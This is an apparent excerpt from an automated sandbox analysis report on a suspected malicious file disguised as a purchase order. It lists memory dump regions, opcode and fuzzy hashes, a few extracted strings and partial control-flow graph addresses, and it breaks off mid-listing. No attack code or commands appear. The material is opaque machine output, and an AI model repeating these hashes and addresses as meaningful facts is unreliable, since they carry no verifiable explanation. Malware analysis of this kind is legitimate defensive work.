                                                          • Opcode ID: 704a9ea2b04788ae8b84e07ee3fe33765bdc136a2ec5fe3832f7097e6edf1411
                                                          • Instruction ID: 06120f04c2989e523ba2100699eecf03ba8d3a33f404da3fea2c6f9d230d4807
                                                          • Opcode Fuzzy Hash: 704a9ea2b04788ae8b84e07ee3fe33765bdc136a2ec5fe3832f7097e6edf1411
                                                          • Instruction Fuzzy Hash: BEB1E274E04358CFDB29DFA9D884BADBBF2BB89304F1090A9D819A7350DB749985CF01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dbq
                                                          • API String ID: 0-1887291361
                                                          • Opcode ID: fc30f8c6b026067ad43358bb3a8db9ed1ad00140c0a8cf23feb98c5eb2578163
                                                          • Instruction ID: a6f45c1b4c5fad25dc7705cd819e4dc05eae01d0937afc4c53a562b5d898990e
                                                          • Opcode Fuzzy Hash: fc30f8c6b026067ad43358bb3a8db9ed1ad00140c0a8cf23feb98c5eb2578163
                                                          • Instruction Fuzzy Hash: 2C813574D05208CFDB18DFA9D589BADBBF2FB89304F1080A9E449A7254DB745E85CF42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dbq
                                                          • API String ID: 0-1887291361
                                                          • Opcode ID: b4f5a50a8dc63e356b85c7c61cf16e7eb9b5f63a57a57e5945239f6eeb109669
                                                          • Instruction ID: bed8b391474f3d07fbdeefc5b1fac1c8d83d2ecbee4528a261964477acca0b91
                                                          • Opcode Fuzzy Hash: b4f5a50a8dc63e356b85c7c61cf16e7eb9b5f63a57a57e5945239f6eeb109669
                                                          • Instruction Fuzzy Hash: 4D812670D0524CCFDB18DFA9D584BADBBB2FB89304F1080A9E449A7254DB745E85CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2205cc3be5b9648d05e0da718e8e10595761b4b50783829c960fe449c61d04a
                                                          • Instruction ID: 974d5d6a5cd9069d4df73ab27aa42738dfe160dd90ee5e19393a5dcebc0b94b4
                                                          • Opcode Fuzzy Hash: f2205cc3be5b9648d05e0da718e8e10595761b4b50783829c960fe449c61d04a
                                                          • Instruction Fuzzy Hash: 5032A374A042298FCB65DF28C994BA9B7B6FF88300F1081E9E54DA7351DB30AE81DF54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e4b3c90d6a40991e29e99bb0dde753727478663e56330aa1f4d64edaddd48ca
                                                          • Instruction ID: 6b83d8d0aa1801dbb29490a68fb865635c04739347a152eb29eb4e42a2a01a12
                                                          • Opcode Fuzzy Hash: 3e4b3c90d6a40991e29e99bb0dde753727478663e56330aa1f4d64edaddd48ca
                                                          • Instruction Fuzzy Hash: 09E1F274E01258DFDF18DFA8C854BADBBF2BB48310F10826AD899A7354DB785984CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34496d581b0b5734d3ebf34b667c15481488c43797f5cfc8dbaeb3c03348ba8d
                                                          • Instruction ID: 028dc639d6d72b06f77421c856ea2e7deaf84418549b331324ee7bdd13fafde5
                                                          • Opcode Fuzzy Hash: 34496d581b0b5734d3ebf34b667c15481488c43797f5cfc8dbaeb3c03348ba8d
                                                          • Instruction Fuzzy Hash: 71D10374E05258CFDB18DFA8C954BADBBF2FB88304F1091A9D409AB295CB745E85CF12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 841b9fa349f9b30c9e631c0da919ad0374599659c51f63ad71592080469c7834
                                                          • Instruction ID: d0fa9bd105354ec0cb1653fd7d51d8f410dd158aeafde0b06a6121a888f79ae6
                                                          • Opcode Fuzzy Hash: 841b9fa349f9b30c9e631c0da919ad0374599659c51f63ad71592080469c7834
                                                          • Instruction Fuzzy Hash: D5D1F170E05258CFDB18DFA8C954BADBBF2BB89304F1090A9D41DAB295CB745E85CF12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8af99f50b1dc5d64706aac999cf707d41e8156d83425c01103200dae9c9ccea0
                                                          • Instruction ID: ac89c42c4fc9a2e21a4098f0c53699f77c627d689647c76be7ebde0464b1aff8
                                                          • Opcode Fuzzy Hash: 8af99f50b1dc5d64706aac999cf707d41e8156d83425c01103200dae9c9ccea0
                                                          • Instruction Fuzzy Hash: A7C12A70D05258CFDB68DFA8C998BEDBBF2FB49304F1090A9E409AB251DB746985DF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 654b1bc33a952448cae553b59ac5585a86591ece36d13567d56b4cf6ac81e94f
                                                          • Instruction ID: 3aa568010e7be6b4973bf2f21c507c34f6313b1e8793c7ed3053dec386878ac5
                                                          • Opcode Fuzzy Hash: 654b1bc33a952448cae553b59ac5585a86591ece36d13567d56b4cf6ac81e94f
                                                          • Instruction Fuzzy Hash: FBC12B74E05248CFDB58DFA9D848BADBBF2FB89310F1081AAD849A7354DB749985CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed6bb5e4d245cf59c32cda01bbd9a3f497fbb71eeb4770c412b609397c9f2fb3
                                                          • Instruction ID: d8ec6779548ae217d4f7625dd90422587cfc0511a67c2a70c24a87db9c2640dd
                                                          • Opcode Fuzzy Hash: ed6bb5e4d245cf59c32cda01bbd9a3f497fbb71eeb4770c412b609397c9f2fb3
                                                          • Instruction Fuzzy Hash: D2C12974D01258CFEB68DF68C999BEDBBF2FB49304F1080A9E409AB251DB746985CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09e68f6d71de5f3c217c230ce87e213bc347b1f8019a5606ce041729afa464b9
                                                          • Instruction ID: 9f0c4243de9750cffa122b274f9f02d6abbf5df3606bf068572d30083f1f8382
                                                          • Opcode Fuzzy Hash: 09e68f6d71de5f3c217c230ce87e213bc347b1f8019a5606ce041729afa464b9
                                                          • Instruction Fuzzy Hash: 7C915A31A04204CFDB14DB48D484BAAB7B3EF94300F69C1A5D019AB65ADB75ED89CBB4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d8a52ba8d98e5bafa5303728e3d4b3d135a84b1176a809dc15d3fca4a8b8173
                                                          • Instruction ID: 1cd38c7a3f270b6f3887fc3f364c4a5ed58285c87c2f89468071a22533ed1288
                                                          • Opcode Fuzzy Hash: 6d8a52ba8d98e5bafa5303728e3d4b3d135a84b1176a809dc15d3fca4a8b8173
                                                          • Instruction Fuzzy Hash: 5F914C34A00604CFE754CF59D489B9AB7F2FB86310F69C664E416AB295C374EC89CF62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d31ffea16e2505c2bf919d081f41b145b1885b7d8ce2ad4df32494af23fdd354
                                                          • Instruction ID: 7106ca98967b44db24c724470b29e42b826929a603e1f873b6304701b0795bd1
                                                          • Opcode Fuzzy Hash: d31ffea16e2505c2bf919d081f41b145b1885b7d8ce2ad4df32494af23fdd354
                                                          • Instruction Fuzzy Hash: C8914C34A00604CFE754CF59D489B9AB7F2FB86310F69C664E416AB295C374EC89CF62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d38590c68f5d91a44294bd8190b69d6e48ad6bb961949e8971edeb6ecdb7b8d
                                                          • Instruction ID: df3b77bd59f1fa100890cb5a7a0adc02fa69249a919ac2952efc731a1322cb47
                                                          • Opcode Fuzzy Hash: 0d38590c68f5d91a44294bd8190b69d6e48ad6bb961949e8971edeb6ecdb7b8d
                                                          • Instruction Fuzzy Hash: 1351F9B1E056598BDB19CF6BC94469ABBF3AFC8300F08C0BAD408AB255DB744982CE54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44074458233d9af4237b55b050f3683a5759a34833db0741d0b2deeebdc601c5
                                                          • Instruction ID: 87193fa6154d1a55422a3209e225c250b82128fe010631fb3ab1269172c383f5
                                                          • Opcode Fuzzy Hash: 44074458233d9af4237b55b050f3683a5759a34833db0741d0b2deeebdc601c5
                                                          • Instruction Fuzzy Hash: C7316874A05218CFCB28EF68D8847ADBBB1FB8A301F1091EAD449A7255DB30AD81DF04

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 807 59eee48-59eee70 809 59eeebe-59eeecc 807->809 810 59eee72-59eeeb9 807->810 811 59eeece-59eeed9 809->811 812 59eeedb 809->812 854 59ef315-59ef31c 810->854 814 59eeedd-59eeee4 811->814 812->814 816 59eefcd-59eefd1 814->816 817 59eeeea-59eeeee 814->817 821 59ef027-59ef031 816->821 822 59eefd3-59eefe2 816->822 819 59ef31d-59ef345 817->819 820 59eeef4-59eeef8 817->820 829 59ef34c-59ef376 819->829 823 59eef0a-59eef68 820->823 824 59eeefa-59eef04 820->824 825 59ef06a-59ef090 821->825 826 59ef033-59ef042 821->826 831 59eefe6-59eefeb 822->831 862 59eef6e-59eefc8 823->862 863 59ef3db-59ef405 823->863 824->823 824->829 846 59ef09d 825->846 847 59ef092-59ef09b 825->847 840 59ef37e-59ef394 826->840 841 59ef048-59ef065 826->841 829->840 835 59eefed-59ef022 call 59ee910 831->835 836 59eefe4 831->836 835->854 836->831 865 59ef39c-59ef3d4 840->865 841->854 853 59ef09f-59ef0c7 846->853 847->853 870 59ef0cd-59ef0e6 853->870 871 59ef198-59ef19c 853->871 862->854 872 59ef40f-59ef415 863->872 873 59ef407-59ef40d 863->873 865->863 870->871 892 59ef0ec-59ef0fb 870->892 874 59ef19e-59ef1b7 871->874 875 59ef216-59ef220 871->875 873->872 880 59ef416-59ef453 873->880 874->875 897 59ef1b9-59ef1c8 874->897 876 59ef27d-59ef286 875->876 877 59ef222-59ef22c 875->877 882 59ef2be-59ef30b 876->882 883 59ef288-59ef2b6 876->883 890 59ef22e-59ef230 877->890 891 59ef232-59ef244 877->891 901 59ef313 882->901 883->882 898 59ef246-59ef248 890->898 891->898 908 59ef0fd-59ef103 892->908 909 59ef113-59ef128 892->909 914 59ef1ca-59ef1d0 897->914 915 59ef1e0-59ef1eb 897->915 905 59ef24a-59ef24e 898->905 906 59ef276-59ef27b 898->906 901->854 910 59ef26c-59ef26f 905->910 911 59ef250-59ef269 905->911 906->876 906->877 916 59ef107-59ef109 908->916 917 59ef105 908->917 920 59ef15c-59ef165 909->920 921 59ef12a-59ef156 909->921 910->906 911->910 923 59ef1d4-59ef1d6 914->923 924 59ef1d2 914->924 915->863 925 59ef1f1-59ef214 915->925 916->909 917->909 920->863 922 59ef16b-59ef192 920->922 921->865 921->920 922->871 922->892 923->915 924->915 925->875 925->897
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hbq$Hbq$Hbq
                                                          • API String ID: 0-2297679979
                                                          • Opcode ID: 297b2b2e7f51616d0c4ad8275b80ff014654d576250f5735a2c67a2591b276c6
                                                          • Instruction ID: dfbe7bb56a5e66e39d41faf59da44c517c32cb48a89d132d404ce099f8cab15d
                                                          • Opcode Fuzzy Hash: 297b2b2e7f51616d0c4ad8275b80ff014654d576250f5735a2c67a2591b276c6
                                                          • Instruction Fuzzy Hash: EF125C31A002048FCB25DFA5D884AAEBBF6FF88300F14856DE54A9B395DB35ED46CB51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 938 5b5fa20-5b5fa5d 940 5b5fa7f-5b5fa95 938->940 941 5b5fa5f-5b5fa64 call d4fe70 938->941 946 5b5fe0b-5b5fe1f 940->946 947 5b5fa9b-5b5faa7 940->947 943 5b5fa6a-5b5fa6c 941->943 943->940 944 5b5fa6e-5b5fa76 943->944 944->940 956 5b5fe5f-5b5fe68 946->956 948 5b5faad-5b5fab0 947->948 949 5b5fbd8-5b5fbdf 947->949 950 5b5fab3-5b5fabc 948->950 952 5b5fbe5-5b5fbee 949->952 953 5b5fd0e-5b5fd48 949->953 954 5b5ff00 950->954 955 5b5fac2-5b5fad6 950->955 952->953 957 5b5fbf4-5b5fd00 952->957 1032 5b5fd4b call 59c1d18 953->1032 1033 5b5fd4b call 59c1d08 953->1033 964 5b5ff05-5b5ff09 954->964 970 5b5fadc-5b5fb71 955->970 971 5b5fbc8-5b5fbd2 955->971 958 5b5fe2d-5b5fe36 956->958 959 5b5fe6a-5b5fe71 956->959 1030 5b5fd02 957->1030 1031 5b5fd0b 957->1031 958->954 966 5b5fe3c-5b5fe4e 958->966 962 5b5fe73-5b5feb6 959->962 963 5b5febf-5b5fec6 959->963 962->963 972 5b5fec8-5b5fed8 963->972 973 5b5feeb-5b5fefe 963->973 968 5b5ff14 964->968 969 5b5ff0b 964->969 980 5b5fe50-5b5fe55 966->980 981 5b5fe5e 966->981 969->968 1015 5b5fb90-5b5fbc3 970->1015 1016 5b5fb73-5b5fb89 970->1016 971->949 971->950 972->973 982 5b5feda-5b5fee2 972->982 973->964 1035 5b5fe58 call 59c24b8 980->1035 1036 5b5fe58 call 59c24a8 980->1036 981->956 982->973 990 5b5fd51-5b5fe02 990->946 1015->971 1016->1015 1030->1031 1031->953 1032->990 1033->990 1035->981 1036->981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$4'^q
                                                          • API String ID: 0-1196845430
                                                          • Opcode ID: a0fbfa1754d110e28d33d609ed59e49fe9da3c680c3acf471c79ceac8faec5fd
                                                          • Instruction ID: a45060678521ff1dbfc61e656584be7781257085e9a679449a51adfec210f636
                                                          • Opcode Fuzzy Hash: a0fbfa1754d110e28d33d609ed59e49fe9da3c680c3acf471c79ceac8faec5fd
                                                          • Instruction Fuzzy Hash: A5F1CB74A10118DFCB08DFA4D998AADB7B2FF88711F118155E906AB3A5DB74EC42CF41

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1137 59c3b48-59c3b58 1138 59c3b5e-59c3b62 1137->1138 1139 59c3c71-59c3c96 1137->1139 1140 59c3c9d-59c3cc2 1138->1140 1141 59c3b68-59c3b71 1138->1141 1139->1140 1143 59c3cc9-59c3cff 1140->1143 1141->1143 1144 59c3b77-59c3b9e 1141->1144 1159 59c3d06-59c3d5c 1143->1159 1154 59c3ba4-59c3ba6 1144->1154 1155 59c3c66-59c3c70 1144->1155 1156 59c3ba8-59c3bab 1154->1156 1157 59c3bc7-59c3bc9 1154->1157 1156->1159 1160 59c3bb1-59c3bbb 1156->1160 1161 59c3bcc-59c3bd0 1157->1161 1179 59c3d5e-59c3d72 1159->1179 1180 59c3d80-59c3d97 1159->1180 1160->1159 1162 59c3bc1-59c3bc5 1160->1162 1163 59c3c31-59c3c3d 1161->1163 1164 59c3bd2-59c3be1 1161->1164 1162->1157 1162->1161 1163->1159 1166 59c3c43-59c3c60 1163->1166 1164->1159 1171 59c3be7-59c3c2e 1164->1171 1166->1154 1166->1155 1171->1163 1236 59c3d75 call 59c40d8 1179->1236 1237 59c3d75 call 59c40c7 1179->1237 1238 59c3d75 call 59c43c0 1179->1238 1239 59c3d75 call 59c4260 1179->1239 1187 59c3d9d-59c3e83 call 59c2b80 call 59c1d18 1180->1187 1188 59c3e88-59c3e98 1180->1188 1186 59c3d7b 1189 59c3fab-59c3fb6 1186->1189 1187->1188 1193 59c3e9e-59c3f78 1188->1193 1194 59c3f86-59c3fa2 1188->1194 1195 59c3fb8-59c3fc8 1189->1195 1196 59c3fe5-59c4006 1189->1196 1233 59c3f7a 1193->1233 1234 59c3f83 1193->1234 1194->1189 1204 59c3fd8-59c3fde 1195->1204 1205 59c3fca-59c3fd0 1195->1205 1204->1196 1205->1204 1233->1234 1234->1194 1236->1186 1237->1186 1238->1186 1239->1186
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$(bq$Hbq
                                                          • API String ID: 0-2835675688
                                                          • Opcode ID: 02127f3b08c1d3a200a49d8e8b669875105b199ef40bbe3681110371fb592fde
                                                          • Instruction ID: 456ac3cf907e12c21657b39937641466f5036de0115f0800f2101969f303b782
                                                          • Opcode Fuzzy Hash: 02127f3b08c1d3a200a49d8e8b669875105b199ef40bbe3681110371fb592fde
                                                          • Instruction Fuzzy Hash: B0E1F035B00209DFCB04EF64E4949ADBBB2FF89310F558569E806AB365DB34ED42CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747687806.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5970000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: 452850fa219e0c86aae64dd9e412b12effced3e9147f2caeb3f196943735a38d
                                                          • Instruction ID: af29c34c71592983b8af74200d02fe84e19a79e822cc3a09a25bf9073099a20e
                                                          • Opcode Fuzzy Hash: 452850fa219e0c86aae64dd9e412b12effced3e9147f2caeb3f196943735a38d
                                                          • Instruction Fuzzy Hash: 77520974E0420DCFCB15DFA8C499AAEBBB6FF49300F548556E512AB390CB386981DF91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1578 5971da8-5971dd3 1580 5971dd5 1578->1580 1581 5971dda-5971df9 1578->1581 1580->1581 1582 5971dfb-5971e04 1581->1582 1583 5971e1a 1581->1583 1585 5971e06-5971e09 1582->1585 1586 5971e0b-5971e0e 1582->1586 1584 5971e1d-5971e21 1583->1584 1588 59723dc-59723f3 1584->1588 1587 5971e18 1585->1587 1586->1587 1587->1584 1590 5971e26-5971e2a 1588->1590 1591 59723f9-59723fd 1588->1591 1594 5971e2f-5971e33 1590->1594 1595 5971e2c-5971e87 1590->1595 1592 5972432-5972436 1591->1592 1593 59723ff-597242f 1591->1593 1599 5972457 1592->1599 1600 5972438-5972441 1592->1600 1593->1592 1597 5971e35-5971e59 1594->1597 1598 5971e5c-5971e7e 1594->1598 1601 5971e8c-5971e90 1595->1601 1602 5971e89-5971ee5 1595->1602 1597->1598 1598->1588 1604 597245a-5972460 1599->1604 1605 5972443-5972446 1600->1605 1606 5972448-597244b 1600->1606 1609 5971e92-5971eb6 1601->1609 1610 5971eb9-5971edc 1601->1610 1613 5971ee7-5971f48 1602->1613 1614 5971eea-5971eee 1602->1614 1612 5972455 1605->1612 1606->1612 1609->1610 1610->1588 1612->1604 1623 5971f4d-5971f51 1613->1623 1624 5971f4a-5971fa6 1613->1624 1618 5971f17-5971f2e 1614->1618 1619 5971ef0-5971efd 1614->1619 1636 5971f30-5971f36 1618->1636 1637 5971f3e-5971f3f 1618->1637 1642 5971f06-5971f14 1619->1642 1628 5971f53-5971f77 1623->1628 1629 5971f7a-5971f9d 1623->1629 1634 5971fab-5971faf 1624->1634 1635 5971fa8-5972004 1624->1635 1628->1629 1629->1588 1639 5971fb1-5971fd5 1634->1639 1640 5971fd8-5971ffb 1634->1640 1645 5972006-5972062 1635->1645 1646 5972009-597200d 1635->1646 1636->1637 1637->1588 1639->1640 1640->1588 1642->1618 1655 5972067-597206b 1645->1655 1656 5972064-59720c0 1645->1656 1649 5972036-5972059 1646->1649 1650 597200f-5972033 1646->1650 1649->1588 1650->1649 1658 5972094-59720b7 1655->1658 1659 597206d-5972091 1655->1659 1665 59720c5-59720c9 1656->1665 1666 59720c2-5972123 1656->1666 1658->1588 1659->1658 1668 59720f2-5972109 1665->1668 1669 59720cb-59720ef 1665->1669 1675 5972125-597218d 1666->1675 1676 5972128-597212c 1666->1676 1685 597210b-5972111 1668->1685 1686 5972119-597211a 1668->1686 1669->1668 1687 5972192-5972196 1675->1687 1688 597218f-59721f7 1675->1688 1678 5972161-5972184 1676->1678 1679 597212e-597215e 1676->1679 1678->1588 1679->1678 1685->1686 1686->1588 1689 59721cb-59721ee 1687->1689 1690 5972198-59721c8 1687->1690 1696 59721fc-5972200 1688->1696 1697 59721f9-5972261 1688->1697 1689->1588 1690->1689 1704 5972235-5972258 1696->1704 1705 5972202-5972232 1696->1705 1706 5972266-597226a 1697->1706 1707 5972263-59722cb 1697->1707 1704->1588 1705->1704 1714 597229f-59722c2 1706->1714 1715 597226c-597229c 1706->1715 1716 59722d0-59722d4 1707->1716 1717 59722cd-5972335 1707->1717 1714->1588 1715->1714 1724 59722d6-5972306 1716->1724 1725 5972309-597232c 1716->1725 1726 5972337-597239c 1717->1726 1727 597233a-597233e 1717->1727 1724->1725 1725->1588 1736 59723d1-59723d4 1726->1736 1737 597239e-59723ce 1726->1737 1733 5972373-5972396 1727->1733 1734 5972340-5972370 1727->1734 1733->1588 1734->1733 1736->1588 1737->1736
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747687806.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5970000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: bb28e587439b7eab646b1701e1e3168e2d0434d83c68aa7f06ab159f8ca0bd6d
                                                          • Instruction ID: d8cf30dbb8f551a9f38696f02bf86cb2601edcaa6b11895dc5650d2e3decf651
                                                          • Opcode Fuzzy Hash: bb28e587439b7eab646b1701e1e3168e2d0434d83c68aa7f06ab159f8ca0bd6d
                                                          • Instruction Fuzzy Hash: B222C434E1521CCFCF14DFA4C5586ACBBB6FF89301F6084AAD40AAB295DB386A45CF51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1750 59718c0-59718e8 1751 59718ef-5971918 1750->1751 1752 59718ea 1750->1752 1753 597191a-5971923 1751->1753 1754 5971939 1751->1754 1752->1751 1755 5971925-5971928 1753->1755 1756 597192a-597192d 1753->1756 1757 597193c-5971940 1754->1757 1758 5971937 1755->1758 1756->1758 1759 5971cf7-5971d0e 1757->1759 1758->1757 1761 5971945-5971949 1759->1761 1762 5971d14-5971d18 1759->1762 1763 597194e-5971952 1761->1763 1764 597194b-59719a8 1761->1764 1765 5971d4d-5971d51 1762->1765 1766 5971d1a-5971d4a 1762->1766 1770 5971954-5971978 1763->1770 1771 597197b-597199f 1763->1771 1774 59719ad-59719b1 1764->1774 1775 59719aa-5971a1b 1764->1775 1767 5971d53-5971d5c 1765->1767 1768 5971d72 1765->1768 1766->1765 1772 5971d63-5971d66 1767->1772 1773 5971d5e-5971d61 1767->1773 1776 5971d75-5971d7b 1768->1776 1770->1771 1771->1759 1779 5971d70 1772->1779 1773->1779 1781 59719b3-59719d7 1774->1781 1782 59719da-5971a01 1774->1782 1785 5971a20-5971a24 1775->1785 1786 5971a1d-5971a7a 1775->1786 1779->1776 1781->1782 1805 5971a03-5971a09 1782->1805 1806 5971a11-5971a12 1782->1806 1791 5971a26-5971a4a 1785->1791 1792 5971a4d-5971a71 1785->1792 1795 5971a7f-5971a83 1786->1795 1796 5971a7c-5971ad8 1786->1796 1791->1792 1792->1759 1801 5971a85-5971aa9 1795->1801 1802 5971aac-5971acf 1795->1802 1807 5971add-5971ae1 1796->1807 1808 5971ada-5971b3c 1796->1808 1801->1802 1802->1759 1805->1806 1806->1759 1814 5971ae3-5971b07 1807->1814 1815 5971b0a-5971b22 1807->1815 1817 5971b41-5971b45 1808->1817 1818 5971b3e-5971ba0 1808->1818 1814->1815 1827 5971b24-5971b2a 1815->1827 1828 5971b32-5971b33 1815->1828 1824 5971b47-5971b6b 1817->1824 1825 5971b6e-5971b86 1817->1825 1829 5971ba5-5971ba9 1818->1829 1830 5971ba2-5971c04 1818->1830 1824->1825 1838 5971b96-5971b97 